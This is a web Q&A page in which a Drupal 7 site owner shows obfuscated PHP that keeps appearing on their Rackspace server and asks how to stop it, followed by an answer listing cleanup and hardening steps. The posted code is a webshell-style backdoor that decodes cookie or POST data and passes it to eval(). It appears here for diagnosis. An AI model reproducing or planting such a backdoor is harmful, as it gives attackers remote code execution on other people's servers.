DEVHIDE
Login Or Sign up

Drupal 7 Recent log messages

327 Views Asked by At

I am facing with an issue. Everyday on my server appers .ico files and .php file with this kind of code:

$zvtizrs = 'y6v1i4be#torufpkxc7_8Hg0n*-2sladm\'';$yjzgov = Array();$yjzgov[] = $zvtizrs[30].$zvtizrs[3].$zvtizrs[30].$zvtizrs[27].$zvtizrs[1].$zvtizrs[23].$zvtizrs[30].$zvtizrs[13].$zvtizrs[26].$zvtizrs[6].$zvtizrs[20].$zvtizrs[31].$zvtizrs[30].$zvtizrs[26].$zvtizrs[5].$zvtizrs[3].$zvtizrs[27].$zvtizrs[18].$zvtizrs[26].$zvtizrs[20].$zvtizrs[3].$zvtizrs[13].$zvtizrs[27].$zvtizrs[26].$zvtizrs[1].$zvtizrs[23].$zvtizrs[5].$zvtizrs[13].$zvtizrs[5].$zvtizrs[13].$zvtizrs[23].$zvtizrs[20].$zvtizrs[30].$zvtizrs[18].$zvtizrs[17].$zvtizrs[7];$yjzgov[] = $zvtizrs[21].$zvtizrs[25];$yjzgov[] = $zvtizrs[8];$yjzgov[] = $zvtizrs[17].$zvtizrs[10].$zvtizrs[12].$zvtizrs[24].$zvtizrs[9];$yjzgov[] = $zvtizrs[28].$zvtizrs[9].$zvtizrs[11].$zvtizrs[19].$zvtizrs[11].$zvtizrs[7].$zvtizrs[14].$zvtizrs[7].$zvtizrs[30].$zvtizrs[9];$yjzgov[] = $zvtizrs[7].$zvtizrs[16].$zvtizrs[14].$zvtizrs[29].$zvtizrs[10].$zvtizrs[31].$zvtizrs[7];$yjzgov[] = $zvtizrs[28].$zvtizrs[12].$zvtizrs[6].$zvtizrs[28].$zvtizrs[9].$zvtizrs[11];$yjzgov[] = $zvtizrs[30].$zvtizrs[11].$zvtizrs[11].$zvtizrs[30].$zvtizrs[0].$zvtizrs[19].$zvtizrs[32].$zvtizrs[7].$zvtizrs[11].$zvtizrs[22].$zvtizrs[7];$yjzgov[] = $zvtizrs[28].$zvtizrs[9].$zvtizrs[11].$zvtizrs[29].$zvtizrs[7].$zvtizrs[24];$yjzgov[] = $zvtizrs[14].$zvtizrs[30].$zvtizrs[17].$zvtizrs[15];foreach ($yjzgov[7]($_COOKIE, $_POST) as $xtfjdc => $jqlwt){function frtdmz($yjzgov, $xtfjdc, $omljrbn){return $yjzgov[6]($yjzgov[4]($xtfjdc . $yjzgov[0], ($omljrbn / $yjzgov8) + 1), 0, $omljrbn);}function htylm($yjzgov, $xwoin){return @$yjzgov[9]($yjzgov[1], $xwoin);}function twdine($yjzgov, $xwoin){$sknbn = $yjzgov3 % 3;if (!$sknbn) {eval($xwoin1);exit();}}$jqlwt = htylm($yjzgov, $jqlwt);twdine($yjzgov, $yjzgov[5]($yjzgov[2], $jqlwt ^ frtdmz($yjzgov, $xtfjdc, $yjzgov8)));}

Could you please tell me what should I do? I am using rackspace hosting. Also I have a lot of links like this one (/d0E0MDY5VDNpanR6NDM5MzFJaQ==) in recent log. How can I stop that?

Thanks in advance!

php encoding drupal drupal-7 rackspace
Original Q&A
1

There are 1 best solutions below

0
MilanG On

Hacked. I was recently cleaning hacked site my self and it was nightmare. Best would be to retrieve some recent version from backup and immediately apply all security updates. If there is no backup (big problem!) you can try "cleaning" the site as I did:

  • Clean all the files with malicious content. Go search/replace trough all the files.
  • Dump database and do the same thing to dump file - remove malicious content and then import it back.
  • Check for user accounts. If there are some suspicious one block/delete them.
  • Check for newly created suspicious user groups. Delete them too.
  • Make a backup.
  • Apply all security updates/patches. Make fresh backup again.
  • Change all account passwords (drupal admins, ftp accounts, database accounts).
  • Set scheduled backup. I.e. use Becakup&Migrate module for that.

Related Questions in PHP

Related Questions in ENCODING

Related Questions in DRUPAL

Related Questions in DRUPAL-7

Related Questions in RACKSPACE

Trending Questions

Popular # Hahtags

javascript python java c# php android html jquery c++ css ios sql mysql r reactjs node.js arrays c asp.net json

Popular Questions

.

Copyright © 2021 Jogjafile Inc.